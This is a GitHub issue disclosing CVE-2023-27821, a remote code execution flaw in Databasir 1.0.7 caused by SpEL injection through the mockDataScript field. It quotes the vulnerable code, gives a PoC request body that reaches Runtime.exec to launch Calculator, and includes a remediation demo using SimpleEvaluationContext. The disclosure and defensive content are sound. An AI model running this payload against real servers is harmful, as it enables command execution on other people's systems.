CVE-2023-27821: database-1.0.7 has an RCE vulnerability · Issue #269 · vran-dev/databasir

Databasir v1.0.7 was discovered to contain a remote code execution (RCE) vulnerability via the mockDataScript parameter.


Impact

Databasir is a team-oriented relational database model document management platform.
Databasir 1.0.7 has a remote code execution vulnerability: a SpEL expression supplied in the mockDataScript field of a mock rule is evaluated server-side in an unrestricted StandardEvaluationContext, so an attacker can execute arbitrary commands on the server, for example open -a Calculator.

Unsafe code

SpelScriptEvaluator uses a StandardEvaluationContext as its evaluation context; the script parameter is attacker-controlled and is not filtered or validated in any way.

SimpleEvaluationContext - exposes a subset of the SpEL language features and configuration options, intended for categories of expressions that do not need the full extent of the SpEL language syntax and should be meaningfully restricted.

StandardEvaluationContext - exposes the full set of SpEL language features and configuration options. You can use it to specify a default root object and to configure every available evaluation-related strategy.

import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import org.springframework.stereotype.Component;
import lombok.RequiredArgsConstructor;

@Component
@RequiredArgsConstructor
public class SpelScriptEvaluator implements MockScriptEvaluator {

    private final SpelExpressionParser spelExpressionParser = new SpelExpressionParser();

    @Override
    public String evaluate(String script, ScriptContext context) {
        // script arrives straight from the request body (mockDataScript) without any filtering
        Expression expression = spelExpressionParser.parseExpression(script);
        // StandardEvaluationContext exposes the full SpEL feature set, including T() type references
        StandardEvaluationContext spelContext = new StandardEvaluationContext(context);
        return expression.getValue(spelContext, String.class);
    }
}

Vulnerable entry point

The script is evaluated when the submitted rules are validated on save. Note that the endpoint is reachable by any authenticated GROUP_MEMBER of the group, not only by owners:

@PreAuthorize("hasAnyAuthority('SYS_OWNER', 'GROUP_OWNER?groupId='+#groupId, 'GROUP_MEMBER?groupId='+#groupId)")
@Operation(summary = "保存 Mock Rule")
@AuditLog(module = AuditLog.Modules.PROJECT, name = "保存 Mock Rule",
        involvedProjectId = "#projectId",
        involvedGroupId = "#groupId")
@PostMapping(Routes.MockData.SAVE_MOCK_RULE)
public JsonData<Void> saveMockRules(@PathVariable Integer groupId,
                                    @PathVariable Integer projectId,
                                    @PathVariable Integer tableId,
                                    @RequestBody @Valid List<ColumnMockRuleSaveRequest> rules) {
    mockDataService.saveMockRules(projectId, tableId, rules);
    return JsonData.ok();
}

PoC

An attacker who controls the rules request body can trigger RCE. In the following request body, T(java.lang.String) is used only to obtain a Class object; the static Class.forName is then invoked on it to load java.lang.Runtime, and the exec call launches Calculator on a macOS host:

[
  {
    "columnName": "test",
    "dependentColumnName": "test",
    "dependentTableName": "test",
    "mockDataScript": "T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('open -a Calculator')",
    "mockDataType": "SCRIPT",
    "tableName": "test"
  }
]

Remediation

The most direct fix: replace StandardEvaluationContext with SimpleEvaluationContext (for example SimpleEvaluationContext.forReadOnlyDataBinding().build()), which rejects T() type references, constructors and bean references at evaluation time. Whichever context is used, the ScriptContext root object should expose only the data a mock script needs, because its public properties remain reachable from the expression.
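The vulnerable evaluator beside a hardened one, as an added example that is not Databasir's own code: it evaluates a benign property-access script and a hostile script of the same T()-based shape as the PoC (resolving a class name instead of spawning a process) first in a StandardEvaluationContext, then in a SimpleEvaluationContext, where the hostile script fails with a SpelEvaluationException. It assumes spring-expression (and its spring-core dependency) on the classpath; the ScriptContext class here is a hypothetical stand-in for Databasir's, with made-up columnName and rowIndex properties.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelContextDemo {

    // Hypothetical stand-in for Databasir's ScriptContext: a root object carrying
    // only the data a mock-data script legitimately needs.
    public static class ScriptContext {
        private final String columnName;
        private final int rowIndex;

        public ScriptContext(String columnName, int rowIndex) {
            this.columnName = columnName;
            this.rowIndex = rowIndex;
        }

        public String getColumnName() { return columnName; }
        public int getRowIndex() { return rowIndex; }
    }

    private static final SpelExpressionParser PARSER = new SpelExpressionParser();

    // Vulnerable shape, as in the issue: StandardEvaluationContext exposes the full
    // SpEL feature set, including T() type references, so a script can reach any class.
    static String evaluateUnsafe(String script, ScriptContext ctx) {
        Expression expression = PARSER.parseExpression(script);
        return expression.getValue(new StandardEvaluationContext(ctx), String.class);
    }

    // Hardened shape: SimpleEvaluationContext in read-only data-binding mode. Type
    // references, constructors and bean references are rejected, and no method resolver
    // is registered unless withInstanceMethods() is added, so the hostile script fails
    // with a SpelEvaluationException while property access on the root object still works.
    static String evaluateSafe(String script, ScriptContext ctx) {
        Expression expression = PARSER.parseExpression(script);
        EvaluationContext spelContext = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        return expression.getValue(spelContext, ctx, String.class);
    }

    public static void main(String[] args) {
        ScriptContext ctx = new ScriptContext("email", 7);

        // A legitimate mock script only reads properties of the root object.
        String benign = "columnName + '_' + rowIndex";
        System.out.println("unsafe / benign : " + evaluateUnsafe(benign, ctx));
        System.out.println("safe   / benign : " + evaluateSafe(benign, ctx));

        // Same trick as the PoC: T(java.lang.String) yields a Class object, on which the
        // static Class.forName is reachable. Here it only resolves the class name rather
        // than going on to getRuntime().exec(...).
        String hostile = "T(java.lang.String).forName('java.lang.Runtime').getName()";
        System.out.println("unsafe / hostile: " + evaluateUnsafe(hostile, ctx));

        try {
            String result = evaluateSafe(hostile, ctx);
            System.out.println("safe   / hostile: evaluated to " + result + " (unexpected)");
        } catch (EvaluationException e) {
            // SimpleEvaluationContext has no TypeLocator, so T(...) throws here
            System.out.println("safe   / hostile: rejected -> " + e.getMessage());
        }
    }
}
```

Compile and run it with spring-expression and spring-core on the classpath. The benign script produces the same string in both contexts; the hostile one is evaluated by the StandardEvaluationContext and rejected by the SimpleEvaluationContext before any class is loaded. If a real ScriptContext must expose methods to scripts, add withInstanceMethods() deliberately and review every public method on the root object, since those become callable from user-supplied expressions.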

Reporter

@luelueking

Source

https://github.com/luelueking/Databasir-1.0.7-vuln-poc
